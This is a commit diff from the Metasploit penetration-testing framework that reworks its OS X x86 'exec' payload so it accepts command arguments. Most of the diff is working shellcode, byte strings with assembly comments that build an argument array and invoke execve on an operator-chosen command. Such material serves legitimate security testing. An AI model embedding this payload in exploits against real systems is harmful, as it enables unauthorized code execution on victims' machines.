Land rapid7#2119 - Accept args for osx exec payload

Author: wchen-r7

modules/payloads/singles/osx/x86/exec.rb

@@ -26,31 +26,73 @@ def initialize(info = {})
 		super(merge_info(info,
 			'Name'          => 'OS X Execute Command',
 			'Description'   => 'Execute an arbitrary command',
-			'Author'        => [ 'snagg <snagg[at]openssl.it>', 'argp <argp[at]census-labs.com>' ],
+			'Author'        =>
+				[
+					'snagg <snagg[at]openssl.it>',
+					'argp <argp[at]census-labs.com>',
+					'joev <jvennix[at]rapid7.com>'
+				],
 			'License'       => BSD_LICENSE,
 			'Platform'      => 'osx',
-			'Arch'          => ARCH_X86))
+			'Arch'          => ARCH_X86
+		))
 
-		# Register exec options
 		register_options(
 			[
 				OptString.new('CMD',  [ true,  "The command string to execute" ]),
-			], self.class)
+			], self.class
+		)
 	end
 
 	#
 	# Dynamically builds the exec payload based on the user's options.
 	#
 	def generate_stage
-		cmd     = datastore['CMD'] || ''
-		len     = cmd.length + 1
-		payload =
-			"\x31\xc0\x50" +
-			Rex::Arch::X86.call(len) + cmd +
-			"\x00\x5e\x89\xe7\xb9" + Rex::Arch::X86.pack_word(len) +
-			"\x00\x00\xfc\xf2\xa4\x89\xe3\x50" +
-			"\x50\x53\xb0\x3b\x50\xcd\x80"
+		cmd_str   = datastore['CMD'] || ''
+		# Split the cmd string into arg chunks
+		cmd_parts = Shellwords.shellsplit(cmd_str)
+		# the non-exe-path parts of the chunks need to be reversed for execve
+		cmd_parts = ([cmd_parts.first] + (cmd_parts[1..-1] || []).reverse).compact
+		arg_str = cmd_parts.map { |a| "#{a}\x00" }.join
 
-	end
+		payload = ''
+
+		# Stuff an array of arg strings into memory
+		payload << "\x31\xc0"                          # xor eax, eax  (eax => 0)
+		payload << Rex::Arch::X86.call(arg_str.length) # jmp over CMD_STR, stores &CMD_STR on stack
+		payload << arg_str
+		payload << "\x5B"                              # pop ebx (ebx => &CMD_STR)
+
+		# now EBX contains &cmd_parts[0], the exe path
+		if cmd_parts.length > 1
+			# Build an array of pointers to arguments
+			payload << "\x89\xD9"                     # mov ecx, ebx
+			payload << "\x50"                         # push eax; null byte (end of array)
+			payload << "\x89\xe2"                     # mov edx, esp (EDX points to the end-of-array null byte)
+
+			cmd_parts[1..-1].each_with_index do |arg, idx|
+				l = [cmd_parts[idx].length+1].pack('V')
+				# can probably save space here by doing the loop in ASM
+				# for each arg, push its current memory location on to the stack
+				payload << "\x81\xC1"                 # add ecx, ...
+				payload << l                          # (cmd_parts[idx] is the prev arg)
+				payload << "\x51"                     # push ecx (&cmd_parts[idx])
+			end
 
+			payload << "\x53"                         # push ebx (&cmd_parts[0])
+			payload << "\x89\xe1"                     # mov ecx, esp (ptr to ptr to first str)
+			payload << "\x52"                         # push edx
+			payload << "\x51"                         # push ecx
+		else
+			# pass NULL args array to execve() call
+			payload << "\x50\x50"                     # push eax, push eax
+		end
+
+		payload << "\x53"                             # push ebx
+		payload << "\xb0\x3b"                         # mov al, 0x3b (execve)
+		payload << "\x50"                             # push eax
+		payload << "\xcd\x80"                         # int 0x80 (triggers execve syscall)
+
+		payload
+	end
 end